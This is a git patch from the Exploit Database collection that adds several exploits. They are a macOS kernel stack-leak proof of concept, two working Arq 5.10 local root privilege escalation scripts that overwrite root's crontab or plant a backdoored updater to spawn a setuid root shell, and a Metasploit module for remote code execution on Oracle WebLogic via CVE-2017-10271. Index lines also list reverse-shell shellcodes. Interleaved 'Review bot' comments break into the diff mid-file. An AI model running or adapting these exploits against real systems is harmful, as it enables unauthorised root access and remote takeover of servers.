From ef96c0511bf7e43703e613053857d0d3ef1bf22f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 30 Jan 2018 05:01:49 +0000
Subject: [PATCH] DB: 2018-01-30
4 changes to exploits/shellcodes
macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding
Arq 5.10 - Local Privilege Escalation (1)
Arq 5.10 - Local Privilege Escalation (2)
Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)
Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)
---
 exploits/macos/dos/43923.c | 134 ++++++++++++++
 exploits/macos/local/43925.rb | 286 ++++++++++++++++++++++++++++++
 exploits/macos/local/43926.sh | 112 ++++++++++++
 exploits/multiple/remote/43924.rb | 190 ++++++++++++++++++++
 files_exploits.csv | 4 +
 files_shellcodes.csv | 2 +-
 6 files changed, 727 insertions(+), 1 deletion(-)
 create mode 100644 exploits/macos/dos/43923.c
 create mode 100755 exploits/macos/local/43925.rb
 create mode 100755 exploits/macos/local/43926.sh
 create mode 100755 exploits/multiple/remote/43924.rb
diff --git a/exploits/macos/dos/43923.c b/exploits/macos/dos/43923.c
new file mode 100644
index 000000000..dacdf4b8d
--- /dev/null
+++ b/exploits/macos/dos/43923.c
@@ -0,0 +1,134 @@
+/*
+The sysctls vfs.generic.conf.* are handled by sysctl_vfs_generic_conf(), which is implemented as follows:
+
+static int
+sysctl_vfs_generic_conf SYSCTL_HANDLER_ARGS
+{
+ int *name, namelen;
+ struct vfstable *vfsp;
+ struct vfsconf vfsc;
+
+ (void)oidp;
+ name = arg1;
+ namelen = arg2;
+
+ [check for namelen==1]
+
+ mount_list_lock();
+ for (vfsp = vfsconf; vfsp; vfsp = vfsp->vfc_next)
+ if (vfsp->vfc_typenum == name[0])
+ break;
+
+ if (vfsp == NULL) {
+ mount_list_unlock();
+ return (ENOTSUP);
+ }
+
+ vfsc.vfc_reserved1 = 0;
+ bcopy(vfsp->vfc_name, vfsc.vfc_name, sizeof(vfsc.vfc_name));
+ vfsc.vfc_typenum = vfsp->vfc_typenum;
+ vfsc.vfc_refcount = vfsp->vfc_refcount;
+ vfsc.vfc_flags = vfsp->vfc_flags;
+ vfsc.vfc_reserved2 = 0;
+ vfsc.vfc_reserved3 = 0;
+
+ mount_list_unlock();
+ return (SYSCTL_OUT(req, &vfsc, sizeof(struct vfsconf)));
+}
+
+`struct vfsconf` is defined as follows:
+
+struct vfsconf {
+ uint32_t vfc_reserved1; /* opaque
+ char vfc_name[MFSNAMELEN]; /* filesystem type name
+ int vfc_typenum; /* historic filesystem type number
+ int vfc_refcount; /* number mounted of this type
+ int vfc_flags; /* permanent flags
+ uint32_t vfc_reserved2; /* opaque
+ uint32_t vfc_reserved3; /* opaque
+};
+
+`MFSNAMELEN` is defined as follows:
+
+#define MFSNAMELEN 15 /* length of fs type name, not inc. null
+#define MFSTYPENAMELEN 16 /* length of fs type name including null
+
+This means that one byte of uninitialized padding exists between `vfc_name` and `vfc_typenum`.
+
+
+This issue was discovered using an AFL-based fuzzer, loosely based on TriforceAFL. 
This is the diff of two runs over the fuzzer queue with different stack poison values (0xcc and 0xdd):
+
+--- traces_cc_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:41.486752415 +0100
++++ traces_dd_/id:018803,src:012522,op:havoc,rep:2,+cov 2017-11-06 13:08:56.583413293 +0100
+@@ -1,19 +1,19 @@
+ loaded 72 bytes fuzzdata
+ USER READ: addr 0xffffffffffffffff, size 8, value 0x00000600020000ca
+ USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000003
+ USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000004
+ USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000060000
+ USER READ: addr 0xffffffffffffffff, size 8, value 0x00ea800500000010
+ USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000010003
+ USER READ: addr 0xffffffffffffffff, size 8, value 0x0000000000000000
+ syscall(rax=0x600020000ca, args=[0x3, 0x4, 0x60000, 0xea800500000010, 0x10003, 0x0]); rsp=0x7ffee418eda8
+ USER READ: addr 0x3, size 8, value 0x0000000000000003
+ USER READ: addr 0xb, size 8, value 0x0000001700000002
+ USER WRITE: addr 0x60000, size 8, value 0x0073666800000000
+ USER WRITE: addr 0x60008, size 8, value 0x0000000000000000
+-USER WRITE: addr 0x60010, size 8, value 0x00000017cc000000
++USER WRITE: addr 0x60010, size 8, value 0x00000017dd000000
+ USER WRITE: addr 0x60018, size 8, value 0x0000100000000001
+ USER WRITE: addr 0x60020, size 8, value 0x0000000000000000
+ sysret
+ OUT OF FUZZER INPUT DATA - REWINDING
+ REWIND! 
(trigger_exception=0x10006; cycles=7)
+
+Verified on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:
+
+$ cat sysctl_conf_test.c
+*/
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+struct vfsconf_withpad {
+ int reserved1;
+ char name[15];
+ unsigned char pad1;
+ int typenum;
+ int refcount;
+ int flags;
+ int reserved2;
+ int reserved3;
+};
+
+int main(void) {
+ int name[] = { CTL_VFS, VFS_GENERIC, VFS_CONF, 0x17 };
+ static struct vfsconf_withpad conf;
+ size_t outlen = sizeof(conf);
+ if (sysctl(name, sizeof(name)/sizeof(name[0]), &conf, &outlen, NULL, 0))
+ err(1, "sysctl");
+ if (outlen != sizeof(conf))
+ errx(1, "outlen != sizeof(conf)");
+ printf("name=%.15s pad1=0x%02hhx typenum=%d refcount=%d flags=%d\n",
+ conf.name, conf.pad1, conf.typenum, conf.refcount, conf.flags);
+}
+
+/*
+$ gcc -o sysctl_conf_test sysctl_conf_test.c -Wall
+$ ./sysctl_conf_test
+name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
+$ ./sysctl_conf_test
+name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
+$ ./sysctl_conf_test
+name=hfs pad1=0x24 typenum=23 refcount=2 flags=4096
+$ ./sysctl_conf_test
+name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
+$ ./sysctl_conf_test
+name=hfs pad1=0x23 typenum=23 refcount=2 flags=4096
+$ ./sysctl_conf_test
+name=hfs pad1=0x26 typenum=23 refcount=2 flags=4096
+*/
\ No newline at end of file
diff --git a/exploits/macos/local/43925.rb b/exploits/macos/local/43925.rb
new file mode 100755
index 000000000..a60abebae
--- /dev/null
+++ b/exploits/macos/local/43925.rb
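Review bot: The six `#include` directives at the top of the test program carry no header name on the new side, so the listing as shown would not compile; the angle-bracket targets appear to have been lost in rendering and should be restored before this file is used as a reproducer. The same stripping seems to affect the `/* opaque` field comments in the quoted `struct vfsconf`, which have no closing `*/`. On the kernel side the write-up pins the cause correctly: `vfsc` is a stack local filled field by field and then copied out whole by `SYSCTL_OUT`, so the padding byte between `vfc_name` and `vfc_typenum` is never written; the standard mitigation for a struct that is copied to userland is to clear it first, `memset(&vfsc, 0, sizeof vfsc);`, before assigning fields. `main` also ends without an explicit `return 0;`, which C99 permits but which is worth adding for clarity.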
@@ -0,0 +1,286 @@ +#!/usr/bin/env ruby + +################################################################# +###### Arq <= 5.10 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################# +###### ###### +###### Usage: ###### +###### ###### +###### ./arq_5.10.rb # stage 1 ###### +###### ###### +###### (wait for next Arq backup run) ###### +###### ###### +###### ./arq_5.10.rb # stage 2 ###### +###### ###### +###### if you know the HMAC from a previous run: ###### +###### ###### +###### ./arq_5.10.rb stage2 ###### +###### ###### +################################################################# +###### USE AT YOUR OWN RISK - THIS WILL OVERWRITE THE ROOT ###### +###### USER'S CRONTAB! ###### +################################################################# + +$binary_target = "/tmp/arq_510_exp" + +class Arq510PrivEsc + def initialize(args) + @payload_file = ".arq_510_exp_payload" + @hmac_file = ENV["HOME"] + "/.arq_510_exp_hmac" + @backup_file = ENV["HOME"] + "/" + @payload_file + + @target = shell("ls -1t ~/Library/Arq/Cache.noindex/ |head -n1") + @bucket_uuid = shell("grep 'writing head blob key' " + + "~/Library/Logs/arqcommitter/* |tail -n1 |sed 's/^.*key //' |cut -d " + + "' ' -f4") + @computer_uuid = shell("cat ~/Library/Arq/config/app_config.plist |grep " + + "-A1 #{@target} |tail -n1 |xargs |cut -d '>' -f2 |cut -d '<' -f1") + @backup_endpoint = shell("cat ~/Library/Arq/config/targets/#{@target}.target " + + "|grep -A1 '>endpointDescription<' |tail -n1 |xargs |cut -d '>' -f2 " + + "| cut -d '<' -f1") + @latest_backup_set = latest_backup_set + + puts " target: #{@target}" + puts " bucket uuid: #{@bucket_uuid}" + puts " computer uuid: #{@computer_uuid}" + puts "backup endpoint: #{@backup_endpoint}" + puts " latest backup: #{@latest_backup_set}\n\n" + + if args.length >0 + method = args.shift + if respond_to? 
method + send method, *args + end + else + if File.exist? @hmac_file + method = :stage2 + else + method = :stage1 + end + + send method + end + end + + def shell(command) + `#{command}`.chomp + end + + def latest_backup_set + shell("grep 'writing head blob' ~/Library/Logs/arqcommitter/* |tail -n1 " + + "|sed 's/.*key //' |cut -d ' ' -f1") + end + + def scan_hmac_list + packsets_path = shell("find ~/Library/Arq/ -type d -name packsets") + hmac = {} + + shell("strings #{packsets_path}/*-trees.db").split("\n").each do |line| + if (m = line.match(/[0-9a-fA-F]+/)) and m[0].length == 40 + if !hmac.include? m[0] + hmac[m[0]] = 1 + end + end + end + + hmac + end + + def stage1 + print "building HMAC cache... " + + hmac = scan_hmac_list + + File.open(@hmac_file, "w") do |f| + f.write(@latest_backup_set + "\n" + hmac.keys.join("\n")) + end + + puts "done - stored at #{@hmac_file}" + + print "dropping backup file... " + + File.open(@backup_file, "w") do |f| + f.write("* * * * * /usr/sbin/chown root:wheel #{$binary_target} &&" + + "/bin/chmod 4755 #{$binary_target}\n") + end + + puts "done" + puts "wait for the next backup run to complete and then run again" + end + + def stage2(target_hmac=nil) + if !target_hmac + if !File.exist? @hmac_file + raise "hmac list not found." + end + + print "loading HMAC cache... " + + data = File.read(@hmac_file).split("\n") + + puts "done" + + initial_backup_set = data.shift + + if initial_backup_set == @latest_backup_set + puts "no new backup created yet" + exit 1 + end + + hmac = {} + data.each do |h| + hmac[h] = 1 + end + + hmac_targets = [] + + print "scanning for HMAC targets... " + + scan_hmac_list.keys.each do |h| + if !hmac[h] + hmac_targets.push h + end + end + + puts "done" + + if hmac_targets.length == 0 + puts "no HMAC targets, unable to continue." 
+ exit 0 + end + + puts "found #{hmac_targets.length} HMAC targets" + + hmac_targets.each do |hmac| + attempt_exploit(hmac) + end + else + attempt_exploit(target_hmac) + end + end + + def build_payload(hmac) + d = "\x01\x00\x00\x00\x00\x00\x00\x00" + e = "\x00\x00\x00\x00\x03" + + @overwrite_path = '/var/at/tabs/root' + + plist = " + + + Endpoint + #{@backup_endpoint} + BucketUUID + #{@bucket_uuid} + BucketName + / + ComputerUUID + #{@computer_uuid} + LocalPath + / + LocalMountPoint + / + StorageType + 1 + SkipDuringBackup + + ExcludeItemsWithTimeMachineExcludeMetadataFlag + + +" + + hex = plist.length.to_s(16).rjust(4,'0') + plist_size = (hex[0,2].to_i(16).chr + hex[2,2].to_i(16).chr) + + pfl = @payload_file.length.chr + opl = @overwrite_path.length.chr + bel = @backup_endpoint.length.chr + + payload = sprintf( + ( + "%s\$%s%s%s%s\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" + + "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30" + + "\x2e\x30\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s" + + "\x00\x00\x00%s%s%s\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00" + + "\x00\x00%s\x00\x00\x00%s%s%s\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00" + + "\x00\x00\x00\x00\x00\x14\x00%s%s%s\x00\x00\x00\x03%s\x0a" + ).force_encoding('ASCII-8BIT'), + d, @target, + d, bel, @backup_endpoint, + plist_size, plist, + d, @latest_backup_set, + d, d, pfl, @payload_file, + d, hmac, + d, d, pfl, @payload_file, + d, opl, @overwrite_path, + e * 10 + ) + + return payload + end + + def attempt_exploit(hmac) + print "trying HMAC: #{hmac} ... 
" + + File.open("/tmp/.arq_exp_510_payload","w") do |f| + f.write(build_payload(hmac)) + end + + output = shell("cat /tmp/.arq_exp_510_payload | " + + "/Applications/Arq.app/Contents/Resources/standardrestorer 2>/dev/null") + + File.delete("/tmp/.arq_exp_510_payload") + + if output.include?("Creating directory structure") and !output.include?("failed") + puts "SUCCESS" + + print "compiling shell invoker... " + + shellcode = "#include \nint main()\n{ setuid(0);setgid(0);" + + "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{$binary_target};rm -f " + + "/var/at/tabs/root;/bin/bash\","+ "NULL);return 0; }" + + IO.popen("gcc -xc -o #{$binary_target} -", mode="r+") do |io| + io.write(shellcode) + io.close + end + + puts "done" + + print "waiting for root+s... " + + timeout = 61 + i = 0 + stop = false + + while i < timeout + s = File.stat($binary_target) + + if s.mode == 0104755 and s.uid == 0 + puts "\n" + exec($binary_target) + end + + sleep 1 + i += 1 + + if !stop + left = 60 - Time.now.strftime("%S").to_i + left == 1 && stop = true + + print "#{left} " + end + end + + puts "exploit failed" + exit 0 + else + puts "FAIL" + end + end +end + +Arq510PrivEsc.new(ARGV) \ No newline at end of file diff --git a/exploits/macos/local/43926.sh b/exploits/macos/local/43926.sh new file mode 100755 index 000000000..e15185659 --- /dev/null +++ b/exploits/macos/local/43926.sh 
@@ -0,0 +1,112 @@ +#!/bin/bash + +################################################################# +###### Arq <= 5.10 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################# + +app="/Applications/Arq.app" +res="$app/Contents/Resources" +lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources" + +vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root` + +if [ "$vuln" == "" ] ; then + echo "Not vulnerable - auto-updates not enabled." + exit 1 +fi + +if [ "$1" != "-f" ] ; then + latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`" + status_line="`egrep -i 'backup session.*?(ended|started)' \ + \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`" + + if [ "$status_line" != "" ] ; then + echo -n "WARNING: backup in progress, the user will very " + echo "likely notice if we exploit now!" + echo "use -f to override." + exit 1 + fi +fi + +owd="`pwd`" + +if [ -e ~/.arq_510_privesc_exp ] ; then + rm -rf ~/.arq_510_privesc_exp +fi + +mkdir ~/.arq_510_privesc_exp +cd ~/.arq_510_privesc_exp + +echo "copying application..." + +cp -R /Applications/Arq.app . + +echo "compiling payloads..." + +cat > payload.sh < shell.c < +#include +int main(int ac, char *av[]) +{ + if (ac > 1 && strcmp(av[1], "boom") == 0) { + setuid(0); + setgid(0); + execl( + "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr" + "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay" + "load.sh;/bin/bash", NULL + ); + } + return 0; +} +EOF +mv Arq.app/Contents/Resources/standardrestorer \ + Arq.app/Contents/Resources/standardrestorer.orig +gcc -o Arq.app/Contents/Resources/standardrestorer shell.c +rm -f shell.c + +payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8` +GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1` +cwd=`pwd` + +echo "creating backdoored Arq.zip..." 
+zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null +rm -rf Arq.app/ + +echo "executing upgrade..." + +"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \ + 1>/dev/null 2>/dev/null + +echo "waiting..." +while : +do + ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8` + x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root` + + if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then + cd "$owd" + $res/standardrestorer boom + exit 0 + fi + sleep 0.2 +done \ No newline at end of file diff --git a/exploits/multiple/remote/43924.rb b/exploits/multiple/remote/43924.rb new file mode 100755 index 000000000..6eae7b885 --- /dev/null +++ b/exploits/multiple/remote/43924.rb 
@@ -0,0 +1,190 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + # include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', + 'Description' => %q( + The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization + remote code execution vulnerability. Supported versions that are affected are + 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin + of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, + HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check + and will not be used when executing the exploit itself. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Kevin Kirsche ', # Metasploit module + 'Luffin', # Proof of Concept + 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery + ], + 'References' => + [ + ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin + ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept + ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit + ['CVE', '2017-10271'], + ['EDB', '43458'] + ], + 'Platform' => %w{ win unix }, + 'Arch' => [ ARCH_CMD ], + 'Targets' => + [ + [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], + [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] + ], + 'DisclosureDate' => "Oct 19 2017", + # Note that this is by index, rather than name. It's generally easiest + # just to put the default at the beginning of the list and skip this + # entirely. 
+ 'DefaultTarget' => 0 + ) + ) + + register_options([ + OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), + OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), + OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]), + # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) + ]) + end + + def cmd_base + if target['Platform'] == 'win' + return 'cmd' + else + return '/bin/sh' + end + end + + def cmd_opt + if target['Platform'] == 'win' + return '/c' + else + return '-c' + end + end + + + # + # This generates a XML payload that will execute the desired payload on the RHOST + # + def exploit_process_builder_payload + # Generate a payload which will execute on a *nix machine using /bin/sh + xml = %Q{ + + + + + + + #{cmd_base} + + + #{cmd_opt} + + + #{payload.encoded.encode(xml: :text)} + + + + + + + + +} + end + + # + # This builds a XML payload that will generate a HTTP GET request to our SRVHOST + # from the target machine. + # + def check_process_builder_payload + xml = %Q{ + + + + + #{get_uri.encode(xml: :text)} + + + + + + + + +} + end + + # + # In the event that a 'check' host responds, we should respond randomly so that we don't clog up + # the logs too much with a no response error or similar. + # + def on_request_uri(cli, request) + random_content = '

'+Rex::Text.rand_text_alphanumeric(20)+'

' + send_response(cli, random_content) + + @received_request = true + end + + # + # The exploit method connects to the remote service and sends a randomly generated string + # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive + # the response from. This is based off of the exploit technique from + # exploits/windows/novell/netiq_pum_eval.rb + # + # This doesn't work as is because MSF cannot mix HttpServer and HttpClient + # at the time of authoring this + # + # def check + # start_service + # + # print_status('Sending the check payload...') + # res = send_request_cgi({ + # 'method' => 'POST', + # 'uri' => normalize_uri(target_uri.path), + # 'data' => check_process_builder_payload, + # 'ctype' => 'text/xml;charset=UTF-8' + # }, datastore['TIMEOUT']) + # + # print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...") + # + # waited = 0 + # until @received_request + # sleep 1 + # waited += 1 + # if waited > datastore['HTTP_DELAY'] + # stop_service + # return Exploit::CheckCode::Safe + # end + # end + # + # stop_service + # return Exploit::CheckCode::Vulnerable + # end + + # + # The exploit method connects to the remote service and sends the specified payload + # encapsulated within a SOAP XML body. + # + def exploit + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'data' => exploit_process_builder_payload, + 'ctype' => 'text/xml;charset=UTF-8' + }, datastore['TIMEOUT']) + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 71a8600e2..b384f2901 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
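Review bot: The module description states that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and the HTTP Server variables are used when running a check, but on the new side the `check` method, the `Msf::Exploit::Remote::HttpServer` include and the `HTTP_DELAY` option are all commented out, so that sentence describes behaviour the module does not have, and `check_process_builder_payload` and `on_request_uri` are dead code. Either drop that sentence from the description or remove the unused methods, keeping the existing comment that explains why HttpServer and HttpClient cannot be mixed. The `%Q{}` XML bodies in `exploit_process_builder_payload` and `check_process_builder_payload` show no element tags on this page, which looks like a rendering loss rather than a defect in the committed file.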
@@ -5481,6 +5481,7 @@ id,file,description,date,author,type,platform,port
 41639,exploits/windows/dos/41639.txt,"ExtraPuTTY 0.29-RC2 - Denial of Service",2017-03-20,hyp3rlinx,dos,windows,
 43903,exploits/multiple/dos/43903.txt,"Artifex MuJS 1.0.2 - Denial of Service",2018-01-28,"Andrea Sindoni",dos,multiple,
 43904,exploits/multiple/dos/43904.txt,"Artifex MuJS 1.0.2 - Integer Overflow",2018-01-28,"Andrea Sindoni",dos,multiple,
+43923,exploits/macos/dos/43923.c,"macOS - 'sysctl_vfs_generic_conf' Stack Leak Through Struct Padding",2018-01-29,"Google Security Research",dos,macos,
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@@ -9299,6 +9300,8 @@ id,file,description,date,author,type,platform,port
 43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,
 43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,
 43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux,
+43925,exploits/macos/local/43925.rb,"Arq 5.10 - Local Privilege Escalation (1)",2018-01-29,"Mark Wadham",local,macos,
+43926,exploits/macos/local/43926.sh,"Arq 5.10 - Local Privilege Escalation (2)",2018-01-29,"Mark Wadham",local,macos,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -15969,6 +15972,7 @@ id,file,description,date,author,type,platform,port
 41638,exploits/windows/remote/41638.txt,"HttpServer 1.0 - Directory Traversal",2017-03-19,malwrforensics,remote,windows,
 43902,exploits/multiple/remote/43902.py,"BMC BladeLogic 8.3.00.64 - Remote Command Execution",2018-01-26,"Paul Taylor",remote,multiple,
 43920,exploits/linux/remote/43920.py,"Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution",2018-01-28,mr_me,remote,linux,
+43924,exploits/multiple/remote/43924.rb,"Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)",2018-01-29,Metasploit,remote,multiple,
 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 1fd51c5cf..bed20f689 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -836,7 +836,7 @@ id,file,description,date,author,type,platform
 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
 43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 43910,shellcodes/linux_x86/43910.c,"Linux/x86 - Egghunter Shellcode (12 Bytes)",2018-01-28,"Nipun Jaswal",shellcode,linux_x86
-43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) Null Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
+43921,shellcodes/arm/43921.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh)+ Null-Free Shellcode (80 bytes)",2018-01-28,rtmcx,shellcode,arm
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.asm,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64